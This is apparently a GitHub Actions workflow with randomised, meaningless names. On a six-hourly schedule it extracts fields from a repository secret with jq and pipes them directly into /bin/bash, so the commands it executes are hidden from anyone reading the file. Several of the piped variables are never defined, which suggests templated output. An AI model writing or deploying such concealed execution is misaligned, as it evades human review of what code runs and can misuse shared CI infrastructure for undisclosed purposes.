name: yunxiaoxi2121
on:
  workflow_dispatch:
  schedule:
    - cron: '42 2/6 * * *'
jobs:  # 20736
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yunxiaoxi2121
        env:
          o6: ${{ secrets.o6 }}
        run: |
          echo $o6 | jq -r .tzcge41 | /bin/bash
          echo $jar77537 | jq -r .y6 | /bin/bash
          echo $ftp41 | jq -r .wvdvg29 | /bin/bash
          echo $bj5 | jq -r .mrnf82 | /bin/bash
          echo $g6649 | jq -r .vys86988 | /bin/bash
          echo $dd9 | jq -r .uhl33534 | /bin/bash
          echo $kt683 | jq -r .rhd12 | /bin/bash
          echo $can7768 | jq -r .qb295 | /bin/bash
          echo $yd2527 | jq -r .wmf1 | /bin/bash
          echo $sbenq01318 | jq -r .zdyz5 | /bin/bash

